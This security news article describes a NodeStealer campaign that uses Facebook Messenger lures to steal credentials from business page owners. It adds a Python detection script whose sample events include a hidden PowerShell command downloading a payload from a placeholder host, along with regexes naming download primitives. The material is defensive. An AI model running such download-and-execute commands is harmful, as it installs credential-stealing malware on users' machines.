An ongoing campaign is targeting Facebook business accounts with malicious messages that aim to steal victims’ credentials and potentially take over their accounts. The attackers primarily target victims in southern Europe and North America, particularly in the service and technology sectors.
Recently, Netskope Threat Labs revealed that Vietnamese threat actors are behind the attacks, using tactics similar to those of other adversaries in the same region. The attackers send deceptive messages via Facebook Messenger to distribute credential-stealing malware packed in ZIP or RAR archives. The payload is disguised as an image of a defective product, and the message prompts Facebook business page owners to download it.
Once the archived file is executed, it opens the Chrome web browser and redirects the victim to a harmless webpage. In the background, a PowerShell command downloads additional payloads, including the Python interpreter and the NodeStealer malware. The NodeStealer variant used in this campaign is more advanced than previous versions: it uses batch files to download and run Python scripts, and it steals credentials and cookies from multiple browsers and websites.
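As an added illustration (not code from the Netskope report), the following Python snippet flags the two stages of the chain described above in constructed Sysmon-style process-creation events: a PowerShell download command spawned by an executable in a user-writable folder, and a Python interpreter running from a user-writable folder launched through a batch file. Field names, file paths and hostnames are assumptions.

```python
"""Toy detection for the NodeStealer-style infection chain described above.
Event layout is Sysmon-like but constructed; paths and hosts are made up."""
import re
from typing import Dict, List, Tuple

# Executables or scripts living under a user-writable profile folder
USER_WRITABLE = re.compile(r"(?i)\\users\\[^\\]+\\(downloads|appdata|desktop)\\")
# Common PowerShell download primitives
PS_DOWNLOAD = re.compile(
    r"(?i)(invoke-webrequest|\biwr\b|downloadfile|downloadstring|webclient|"
    r"start-bitstransfer|\bcurl\b|\bwget\b)")
# python.exe / pythonw.exe / python3.11.exe at the end of an image path
PYTHON_IMAGE = re.compile(r"(?i)\\pythonw?(\d+(\.\d+)?)?\.exe$")

# Constructed sample events: a lure "image" in Downloads opens Chrome, runs a
# PowerShell downloader, then a batch file starts a dropped Python interpreter.
EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 101, "ppid": 100, "image": r"C:\Users\ana\Downloads\product_photo.exe",
     "cmd": "product_photo.exe"},
    {"pid": 102, "ppid": 101, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmd": "chrome.exe https://decoy.example.invalid/"},
    {"pid": 103, "ppid": 101, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -w hidden -c "Invoke-WebRequest http://dl.example.invalid/py.zip '
            '-OutFile $env:APPDATA\\py.zip"'},
    {"pid": 104, "ppid": 103, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd /c C:\Users\ana\AppData\Roaming\run.bat"},
    {"pid": 105, "ppid": 104, "image": r"C:\Users\ana\AppData\Roaming\py\python.exe",
     "cmd": "python.exe stealer.py"},
    # Benign admin PowerShell with no download and a system parent: must not alert
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell Get-Date"},
]

def detect(events: List[Dict]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) for each event matching one of the two stages."""
    by_pid = {e["pid"]: e for e in events}
    alerts: List[Tuple[str, int]] = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        # Stage 1: PowerShell downloader whose parent is a user-writable executable
        if (e["image"].lower().endswith("powershell.exe")
                and PS_DOWNLOAD.search(e["cmd"]) and USER_WRITABLE.search(parent["image"])):
            alerts.append(("powershell_downloader_from_user_path", e["pid"]))
        # Stage 2: Python interpreter in a user-writable path, started by a .bat via cmd.exe
        if (PYTHON_IMAGE.search(e["image"]) and USER_WRITABLE.search(e["image"])
                and parent["image"].lower().endswith("cmd.exe") and ".bat" in parent["cmd"].lower()):
            alerts.append(("user_path_python_from_batch", e["pid"]))
    return alerts

if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"ALERT {rule}: pid={pid} cmd={EVENTS[[x['pid'] for x in EVENTS].index(pid)]['cmd']}")
```

Either stage alone fires on plenty of legitimate software, so in practice the two rules are worth correlating on the same host within a short window rather than alerting on each independently.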
Stolen credentials and cookies can be used by attackers to take control of Facebook accounts and conduct fraudulent transactions through legitimate business pages. This campaign could be the start of a more targeted attack in the future.
It is crucial that Facebook Business account holders exercise caution and avoid downloading suspicious files or clicking on unknown links. Regularly updating security measures and implementing multi-factor authentication can also help protect against such attacks.